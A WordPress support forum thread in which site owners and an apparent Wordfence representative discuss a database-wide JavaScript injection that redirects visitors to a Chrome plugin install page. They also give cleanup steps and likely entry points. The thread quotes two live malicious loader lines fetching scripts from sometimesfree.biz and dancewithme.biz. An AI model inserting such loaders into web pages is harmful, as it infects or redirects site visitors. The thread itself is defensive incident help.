sometimesfree.biz – nasty injection that Wordfence missed

  • Resolved jodamo5

    (@jodamo5)


    7 years, 2 months ago

    One of the sites we look after got hit with nasty code injected throughout the site. It inserted a javascript link to a file hosted at sometimesfree.biz

    The file caused visitors to the site to get redirected to a page that tries to install a Chrome plugin. The script adds a cookie called “crazytime” with a value of 1 with a 12 hour expiry, so that visitors are only redirected on their first visit, and then if they try to go the domain again it then works fine.

    We think the hackers might be using SQL injection, because the link to the javascript is inserted in hundreds of places throughout the site in the posts table and a couple of times in the options table. The first time the site was hit we didn’t have Wordfence installed on it. But then we cleaned up the database and installed Wordfence including configuring the firewall. Wordfence is supposed to stop SQL injection, but within 1 week the site was hacked again and over 1300 entries of the the same script code was injected through the site.

    We don’t know where they got in, but the sites that have been hit all use Contact Form 7, where as our sites that are fine all use Gravity Forms.

    Questions:

    * Does Wordfence do database scans to find malicious code?
    * If so, is sometimesfree.biz on Wordfence’s list of malicious code to warn about?
    * Can Wordfence identify (and stop) code like sometimesfree.biz being inserted in posts? And can it show how the hackers tried to insert the code if that does happen?

Viewing 11 replies - 1 through 11 (of 11 total)

  • Hi @jodamo5,

    Can you confirm that you have the “Scan posts for known dangerous URLs and suspicious content” option as well as the “SQL Injection” firewall rule enabled?

    “sometimesfree[DOT]biz” should indeed be on our domain blacklist.

    Could try and identify the exact time when it the injections happen (by checking last modified timestamp on files or database rows) and then check then access logs to see which requests were made at the time.
    This could give an idea on how it is happening.

    Hi @jodamo5,

    Can you tell me what code I’m looking for in the database to remove the infection? Thank you

    Because a friend have the same injection :\

    Sincerely,

    I have the same problem.. How do I recover from this nasty malware?

    I have the same problem too

    Wordfence didn’t detect , and it was the same question of a friend

    i found a malicious code javascript , in the panel of my theme i didn’t have time to update it, now i delete the code,

    i am now trying to clean database, maybe other files are corrupted, wherever if someone can help, i am all ears

    my facebook : tai.iek

    thank you

    Thread Starter jodamo5

    (@jodamo5)

    Hi @wfyann, sorry for the delay. Yes, I can confirm that we already had the “Scan posts for known dangerous URLs and suspicious content” option enabled.

    @whiteapple5 here are the steps we used to clean up our database:
    – In phpmyadmin search the entire database for “sometimesfree.biz”. Then click onto one of the results and view the line. Then look for the exact script tag that is there – e.g. <script type='text/javascript' src='https://con1.sometimesfree.biz/c.js'></script> or similar.

    Select that exact text, and then install the WordPress Plugin Better Search and Replace – or your preferred search and replace plugin that allows you to select all tables in WP. (Some search and replace plugins don’t search the options table, so you need a plugin that will search both the options table and the posts table).

    Run a search & replace to replace the offending script with nothing (so leave the “replace with” field blank).

    That will fix your site.

    Note – you need to use a search and replace plugin instead of doing it in phpmyadmin directly because WordPress serializes all the data. So using a search and replace plugin will automatically serialize the updated values correctly.

    I have 7 instances in wptm_options and 662 in wptm_posts!

    Wow.

    I also did have the contact form 7 up until yesterday when I began to troubleshoot this.

    @jodamo5

    Help Help Help

    I did as you did, cleaned up the database, erased all infected entries

    I deleted the theme then put the theme updated

    this morning: the problem appears, it feels since the stats, no users as usual …

    I took a look at the panel of my theme

    surprise surprise: another malicious code

    custom javascript :

    var t = document.createElement(“script”); t.type = “text/javascript”; t.src = “https://src.dancewithme.biz/src.js&#8221;; document.head.appendChild(t);

    this time not sometime.biz but with another URL from dancewithme.biz

    any ideas ?

    thank you

    Hi,

    After discussing this topic with my colleagues, it appears that the “sometimesfree[dot]biz” infection mostly occurred on sites that had the “searchreplacedb2.php” script installed (either by your hosting provider or by yourself) — it’s a tool that is usually used for migrating a site, but if it’s not removed after the migration or protected by .htaccess, it can be used by anyone who happens to find it.

    So the first thing you want to do is to check if you have that script, and in such case, remove it.

    Even if you never had that script, it most likely isn’t SQL injection that was used to update all of the posts.
    Updating the posts could be done by any method of accessing the database, like if an attacker finds a publicly visible backup of wp-config.php (with a name like wp-config.bak that the web server will display as plain text), a backup of the site in a public folder, or if the database user has a bad password. Or it could even be a typical backdoor that lets hackers execute PHP.

    In all cases we’d recommend that you follow our site cleaning guide here.

    And we strongly advise changing all of the passwords (especially the database password).

    Thread Starter jodamo5

    (@jodamo5)

    Thanks @wfyann – that’s great information to know.

    Great, jodamo5. This dummy repaired the website on his own, thanks to you ??

    Thank you @jodamo5, I’ve got a site that had some nasty JS dancewithme.biz injected all over and it was not picked up by Wordfence either.

    You’re solution did the trick. Thank you!

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘sometimesfree.biz – nasty injection that Wordfence missed’ is closed to new replies.